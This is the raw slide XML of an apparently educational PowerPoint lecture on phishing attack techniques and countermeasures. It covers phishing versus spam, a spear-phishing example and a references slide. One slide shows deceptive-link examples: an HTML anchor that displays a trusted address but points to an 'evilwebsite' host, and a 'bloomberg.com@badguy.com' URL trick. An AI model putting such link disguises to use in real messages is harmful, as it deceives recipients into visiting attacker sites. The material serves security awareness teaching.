              <a:solidFill>
                <a:srgbClr val="00009E"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00009E"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It is better to be safer now than feel sorry later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00009E"/>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0A2DDB38-1899-4677-9613-E94502B43610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8E88DBDF-FC7A-4E29-8B54-E12C1320BF57}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13004430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F2783DA4-D07B-4321-B078-47B3D3B10100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195263" y="0"/>
            <a:ext cx="8015287" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3600" i="1">
              <a:solidFill>
                <a:srgbClr val="00009E"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="C0C0C0"/>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.antiphishing.org/reports/apwg_report_november_2006.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://72.14.235.104/search?q=cache:-T6-U5dhgYAJ:www.avira.com/en/threats/what_is_phishing.html+Phishing+consequences&amp;hl=en&amp;gl=in&amp;ct=clnk&amp;cd=7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Phishing-dhs-report.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Report_on_phishing.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.cert-in.org.in/training/15thjuly05/phishing.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://www.antiphishing.org/consumer_recs.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058D395F-3C46-47D2-9D66-617CFB05FE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{93C9362F-EC46-4855-B64C-C7EA6C012996}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383488183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 Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283309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274638"/>
            <a:ext cx="8229600" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A sample of spear phishing email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31746" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="914400"/>
            <a:ext cx="6858000" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4800600"/>
            <a:ext cx="7924800" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Thousands of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>high-ranking executives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>across the country have been receiving e-mail messages this week that appear to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>official subpoenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from the United States District Court in San Diego. Each message includes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executive’s name, company and phone number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and commands the recipient to appear before a grand jury in a civil case.”  - N. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>McFeters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ZDNet, April 2008</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457200" y="274638"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Phishing vs. spamming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8229600" cy="5135563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Spam email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Spammers target large groups in an attempt to capitalize on given advertising response rate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Looks bad, often not readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tries to sell you something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Phishing email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Looks plausible, seems credible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Target specific email addresses and individuals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tries to steal data from you</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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="152400"/>
            <a:ext cx="7010400" cy="546100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" cap="small" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="990600"/>
            <a:ext cx="8077200" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Leveraging the specification of Hyper Text Markup Language (HTML) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>= “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.evilwebsite.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>”&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.goodwebsite.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> &lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> displays the address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.goodwebsite.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> in a browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.bloomberg.com@www.badguy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>actually visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.badguy.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hexadecimal and Unicode representation of URL can hide the plaintext address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Fake SSL Certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browsers generate alarms, if server side digital certificate has any inconsistency in different fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Unknown issuer name, expiry date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185057" y="190500"/>
            <a:ext cx="8828314" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How to view a website’s certificate?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="582386" y="963386"/>
            <a:ext cx="7603671" cy="5089071"/>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D16420CF-6551-45AC-A6B3-D788BBD4AA2B}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CF18352A-D274-4105-B550-0A07FD2CDDCA}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FAB866B5-CBAA-42C7-A76F-C9066244E4A0}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Flow</Template>
  <TotalTime>1241</TotalTime>
  <Words>2756</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>383</Paragraphs>
  <Slides>56</Slides>
  <Notes>29</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56</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="70" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri (Headings)</vt:lpstr>
      <vt:lpstr>Constantia</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Monotype Corsiva</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Webdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Flow</vt:lpstr>
      <vt:lpstr>Bitmap Image</vt:lpstr>
      <vt:lpstr>Phishing Attack Techniques and Countermeasures</vt:lpstr>
      <vt:lpstr>What is phishing attack?</vt:lpstr>
      <vt:lpstr>Phishing attack (stage 1): A phishing email</vt:lpstr>
      <vt:lpstr>Phishing attack (stage 2): A fake webpage</vt:lpstr>
      <vt:lpstr>Some characteristics of a phishing email</vt:lpstr>
      <vt:lpstr>A sample of spear phishing email</vt:lpstr>
      <vt:lpstr>Phishing vs. spamming</vt:lpstr>
      <vt:lpstr>Phishing attack techniques</vt:lpstr>
      <vt:lpstr>How to view a website’s certificate?</vt:lpstr>
      <vt:lpstr>How to view a website’s certificate (cont.)?</vt:lpstr>
